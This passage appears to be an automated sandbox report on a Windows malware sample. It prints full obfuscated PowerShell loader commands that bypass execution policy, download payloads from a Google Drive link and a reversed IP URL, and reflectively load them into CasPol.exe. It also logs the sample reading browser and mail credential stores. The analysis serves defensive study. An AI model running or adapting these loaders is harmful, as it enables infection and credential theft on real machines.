                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\oexlux"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\yycdupifp"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\jsiovitzdbnf"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jezym0s5rdc1tktmicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhrgqtdhlqrsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfzklosvrjb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagagnry1boyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagigfxskxtau8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbtugl1vmssdwludcagicagicagicagicagicagicagicagicagicagicagtxz1bmphz0rwleludfb0ciagicagicagicagicagicagicagicagicagicagicagyut4u2tndugpoycgicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicaiciigicagicagicagicagicagicagicagicagicagicagic1oqu1lc1bhy2ugicagicagicagicagicagicagicagicagicagicagied4zvnnvkjxicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakrlgzszlenzvos2y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly84ns4ymtuumja2ljgylzi3mc9pz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ubwuudelgiiwijevudjpbufbeqvrbxgdldgjlc3r0agluz3n3axroymvzdhbpy3r1cmv3axroz3jlyxr0agluz3nvbi52ylmildasmck7u3rbclqtu2xlrvaomyk7u1rbunqgicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ulnziuyi='+[char]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdhvutpbwfnzvvybca9ihp0c2h0dhbzoi8vzccrj3jpdmuuz29vz2xllmnvbs91yycrjz9lehbvjysncnq9zg93bmxvywqmawq9mufjvmdkskp2muy2dlm0c1vpewjusc1zrhzvaejzd3vyihp0czsnkydhvut3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o2fvs2ltywdlqnl0zxmgpsbhvut3jysnzwjdbgllbnqurg93bmxvywreyxrhkgfvs2ltywdlvxjsktthvutpbwfnzvrleccrj3qgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyhhvutpbwfnzuj5dgvzktthvutzdgfydezsywcgpsb6dhm8pejbu0u2nf9tvefsvd4+enrzo2fvs2vuzezsywcnkycgpsb6dhm8pejbu0u2nf9ftkq+pnp0czthvutzdgfydeluzgv4id0gyvvlaw1hz2vuzxh0lkluzgv4t2yoyvvlc3rhcnrgbgfnktthvutlbmrjbmrleca9igfvs2ltywdlvgv4dc5jbmrlee9mkgfvs2vuzezsywcpo2fvs3n0yxj0sw5kzxgglwdlidaglwfuzcbhvutlbmrjbmrlecatz3qnkycgjysnyvvlc3rhcnrjbmrledthvutzdccrj2fydeluzgv4ics9igfvs3n0yxj0rmxhzy5mzw5njysndgg7yvvlymfzzty0tgvuz3roid0gyvvlzw5ksw5kzxgglsbhvutzdgfydeluzgv4o2fvs2jhjysnc2u2nenvbw1hbmqgpsbhvutpbwfnzvrlehquu3vic3ryaw5nkgfvs3n0yxj0sw5kzxgsigfvs2jhc2u2nexlbmd0ack7yvvlymfzzty0umv2zxjzzwqgpsatam9pbiaoyvvlymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpigryyibgb3jfywnolu9iamvjdcb7igfvs18gfslblteuli0oyvvlymfzzty0q29tbwfuzc5mzw5ndggpxtthvutjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdjysnojpgcm9tqmfzjysnzty0u3ryaw5nkgfvs2jhc2u2nfjldmvyc2vkktthvutsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev0nkyc6okxvywqoyvvly29tbwfuzej5dgvzktthvut2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0jysnag9kkhp0c1zbsxp0cyk7yvvldmfptwunkyd0ag9klkludm9rzshhvutudwxslcbakhonkyd0c3r4dc5fq0rgrljxlza3mi8yoc42mdiunteylju4ly86chr0ahp0cywgenrzzgvzyxrpdmfkb3p0jysncywgenrzzgvzjysnyxrpdmenkydkb3p0cywgenrzzgvzyxrpdmfkb3p0cywgenrzq2fzug9senrzlcb6dhnkzxnhdgl2ywrvenrzlcb6dhnkzscrj3nhdgl2ywrvenrzlhp0c2rlc2f0axzhzg96dhmsenrzjysnzgvzyxrpdmfkb3p0cyx6dhnkzxnhdgl2ywrvenqnkydzlhp0c2rlc2f0axzhzg96dhmsjysnenrzzgvzyxrpdmfkb3p0cyx6dhmxenrzlhp0c2rlc2f0axzhzg96dhmpktsnks5yzxbsywnfkcdhvusnlcckjykucmvwbgfjrsgnenrzjyxbc1rsaw5hxvtjsefyxtm5ks5yzxbsywnfkcdkcminlcd8jyl8ic4gkcakcfnib01lwzixxsskufnob01fwzm0xssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('aukimageurl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur zts;'+'aukwebclient = new-object system.net.webclient;aukimagebytes = aukw'+'ebclient.downloaddata(aukimageurl);aukimagetex'+'t = [system.text.encoding]::utf8.getstring(aukimagebytes);aukstartflag = zts<<base64_start>>zts;aukendflag'+' = zts<<base64_end>>zts;aukstartindex = aukimagetext.indexof(aukstartflag);aukendindex = aukimagetext.indexof(aukendflag);aukstartindex -ge 0 -and aukendindex -gt'+' '+'aukstartindex;aukst'+'artindex += aukstartflag.leng'+'th;aukbase64length = aukendindex - aukstartindex;aukba'+'se64command = aukimagetext.substring(aukstartindex, aukbase64length);aukbase64reversed = -join (aukbase64command.tochararray() drb foreach-object { auk_ })[-1..-(aukbase64command.length)];aukcommandbytes = [system.convert]'+'::frombas'+'e64string(aukbase64reversed);aukloadedassembly = [system.reflection.assembly]'+'::load(aukcommandbytes);aukvaimethod = [dnlib.io.home].getmet'+'hod(ztsvaizts);aukvaime'+'thod.invoke(auknull, @(z'+'tstxt.ecdffrw/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztscaspolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replace('auk','$').replace('zts',[string][char]39).replace('drb','|')| . ( $pshome[21]+$pshome[34]+'x')"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]0x3a+[char]0x3a+'frombase64string('+[char]0x22+'jezym0s5rdc1tktmicagicagicagicagicagicagicagicagicagicagica9icagicagicagicagicagicagicagicagicagicagicbhrgqtdhlqrsagicagicagicagicagicagicagicagicagicagicaglu1ftwjfcmrfzklosvrjb04gicagicagicagicagicagicagicagicagicagicagicdbrgxssw1wb3j0kcj1cmxtt04ilcagicagicagicagicagicagicagicagicagicagicagq2hhclnldca9ienoyxjtzxquvw5py29kzsldchvibgljihn0yxrpyyblehrlcm4gsw50uhryifvstervd25sb2fkvg9gawxlkeludfb0ciagicagicagicagicagicagicagicagicagicagicagagnry1boyixzdhjpbmcgicagicagicagicagicagicagicagicagicagicagigfxskxtau8sc3ryaw5nicagicagicagicagicagicagicagicagicagicagicbtugl1vmssdwludcagicagicagicagicagicagicagicagicagicagicagtxz1bmphz0rwleludfb0ciagicagicagicagicagicagicagicagicagicagicagyut4u2tndugpoycgicagicagicagicagicagicagicagicagicagicagic1uqu1ficagicagicagicagicagicagicagicagicagicagicaiciigicagicagicagicagicagicagicagicagicagicagic1oqu1lc1bhy2ugicagicagicagicagicagicagicagicagicagicagied4zvnnvkjxicagicagicagicagicagicagicagicagicagicagicatugfzc1rocnu7icagicagicagicagicagicagicagicagicagicagicakrlgzszlenzvos2y6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly84ns4ymtuumja2ljgylzi3mc9pz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ubwuudelgiiwijevudjpbufbeqvrbxgdldgjlc3r0agluz3n3axroymvzdhbpy3r1cmv3axroz3jlyxr0agluz3nvbi52ylmildasmck7u3rbclqtu2xlrvaomyk7u1rbunqgicagicagicagicagicagicagicagicagicagicagicikzw5wokfquerbvefcz2v0ymvzdhroaw5nc3dpdghizxn0cgljdhvyzxdpdghncmvhdhroaw5nc29ulnziuyi='+[char]34+'))')))"Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcdhvutpbwfnzvvybca9ihp0c2h0dhbzoi8vzccrj3jpdmuuz29vz2xllmnvbs91yycrjz9lehbvjysncnq9zg93bmxvywqmawq9mufjvmdkskp2muy2dlm0c1vpewjusc1zrhzvaejzd3vyihp0czsnkydhvut3zwjdbgllbnqgpsbozxctt2jqzwn0ifn5c3rlbs5ozxquv2viq2xpzw50o2fvs2ltywdlqnl0zxmgpsbhvut3jysnzwjdbgllbnqurg93bmxvywreyxrhkgfvs2ltywdlvxjsktthvutpbwfnzvrleccrj3qgpsbbu3lzdgvtllrlehqurw5jb2rpbmddojpvvey4lkdldfn0cmluzyhhvutpbwfnzuj5dgvzktthvutzdgfydezsywcgpsb6dhm8pejbu0u2nf9tvefsvd4+enrzo2fvs2vuzezsywcnkycgpsb6dhm8pejbu0u2nf9ftkq+pnp0czthvutzdgfydeluzgv4id0gyvvlaw1hz2vuzxh0lkluzgv4t2yoyvvlc3rhcnrgbgfnktthvutlbmrjbmrleca9igfvs2ltywdlvgv4dc5jbmrlee9mkgfvs2vuzezsywcpo2fvs3n0yxj0sw5kzxgglwdlidaglwfuzcbhvutlbmrjbmrlecatz3qnkycgjysnyvvlc3rhcnrjbmrledthvutzdccrj2fydeluzgv4ics9igfvs3n0yxj0rmxhzy5mzw5njysndgg7yvvlymfzzty0tgvuz3roid0gyvvlzw5ksw5kzxgglsbhvutzdgfydeluzgv4o2fvs2jhjysnc2u2nenvbw1hbmqgpsbhvutpbwfnzvrlehquu3vic3ryaw5nkgfvs3n0yxj0sw5kzxgsigfvs2jhc2u2nexlbmd0ack7yvvlymfzzty0umv2zxjzzwqgpsatam9pbiaoyvvlymfzzty0q29tbwfuzc5ub0noyxjbcnjhesgpigryyibgb3jfywnolu9iamvjdcb7igfvs18gfslblteuli0oyvvlymfzzty0q29tbwfuzc5mzw5ndggpxtthvutjb21tyw5kqnl0zxmgpsbbu3lzdgvtlknvbnzlcnrdjysnojpgcm9tqmfzjysnzty0u3ryaw5nkgfvs2jhc2u2nfjldmvyc2vkktthvutsb2fkzwrbc3nlbwjsesa9ifttexn0zw0uumvmbgvjdglvbi5bc3nlbwjsev0nkyc6okxvywqoyvvly29tbwfuzej5dgvzktthvut2ywlnzxrob2qgpsbbzg5sawiusu8usg9tzv0ur2v0twv0jysnag9kkhp0c1zbsxp0cyk7yvvldmfptwunkyd0ag9klkludm9rzshhvutudwxslcbakhonkyd0c3r4dc5fq0rgrljxlza3mi8yoc42mdiunteylju4ly86chr0ahp0cywgenrzzgvzyxrpdmfkb3p0jysncywgenrzzgvzjysnyxrpdmenkydkb3p0cywgenrzzgvzyxrpdmfkb3p0cywgenrzq2fzug9senrzlcb6dhnkzxnhdgl2ywrvenrzlcb6dhnkzscrj3nhdgl2ywrvenrzlhp0c2rlc2f0axzhzg96dhmsenrzjysnzgvzyxrpdmfkb3p0cyx6dhnkzxnhdgl2ywrvenqnkydzlhp0c2rlc2f0axzhzg96dhmsjysnenrzzgvzyxrpdmfkb3p0cyx6dhmxenrzlhp0c2rlc2f0axzhzg96dhmpktsnks5yzxbsywnfkcdhvusnlcckjykucmvwbgfjrsgnenrzjyxbc1rsaw5hxvtjsefyxtm5ks5yzxbsywnfkcdkcminlcd8jyl8ic4gkcakcfnib01lwzixxsskufnob01fwzm0xssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('aukimageurl = ztshttps://d'+'rive.google.com/uc'+'?expo'+'rt=download&id=1aivgjjjv1f6vs4suoybnh-sdvuhbywur zts;'+'aukwebclient = new-object system.net.webclient;aukimagebytes = aukw'+'ebclient.downloaddata(aukimageurl);aukimagetex'+'t = [system.text.encoding]::utf8.getstring(aukimagebytes);aukstartflag = zts<<base64_start>>zts;aukendflag'+' = zts<<base64_end>>zts;aukstartindex = aukimagetext.indexof(aukstartflag);aukendindex = aukimagetext.indexof(aukendflag);aukstartindex -ge 0 -and aukendindex -gt'+' '+'aukstartindex;aukst'+'artindex += aukstartflag.leng'+'th;aukbase64length = aukendindex - aukstartindex;aukba'+'se64command = aukimagetext.substring(aukstartindex, aukbase64length);aukbase64reversed = -join (aukbase64command.tochararray() drb foreach-object { auk_ })[-1..-(aukbase64command.length)];aukcommandbytes = [system.convert]'+'::frombas'+'e64string(aukbase64reversed);aukloadedassembly = [system.reflection.assembly]'+'::load(aukcommandbytes);aukvaimethod = [dnlib.io.home].getmet'+'hod(ztsvaizts);aukvaime'+'thod.invoke(auknull, @(z'+'tstxt.ecdffrw/072/28.602.512.58//:ptthzts, ztsdesativadozt'+'s, ztsdes'+'ativa'+'dozts, ztsdesativadozts, ztscaspolzts, ztsdesativadozts, ztsde'+'sativadozts,ztsdesativadozts,zts'+'desativadozts,ztsdesativadozt'+'s,ztsdesativadozts,'+'ztsdesativadozts,zts1zts,ztsdesativadozts));').replace('auk','$').replace('zts',[string][char]39).replace('drb','|')| . ( $pshome[21]+$pshome[34]+'x')"Jump to behavior
                  Source: CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome[Compatibility Mode] - Microsoft Word:
                  Source: CasPol.exe, 00000014.00000002.696739186.00000000007AC000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: logs.dat.20.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00434CB6 cpuid 20_2_00434CB6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,20_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,20_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,20_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoW,20_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetLocaleInfoA,20_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: IsValidCodePage,GetLocaleInfoW,20_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: EnumSystemLocalesW,20_2_00451FD0
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_004489D7 GetSystemTimeAsFileTime,20_2_004489D7
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_0041B69E GetComputerNameExW,GetUserNameW,20_2_0041B69E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 20_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,20_2_00449210
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 22_2_0041739B GetVersionExW,22_2_0041739B
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 20.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000014.00000002.696341124.0000000000755000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.515289278.00000000038C8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2924, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 3608, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\wordse\logs.dat, type: DROPPED
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data20_2_0040BA4D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: \key3.db20_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
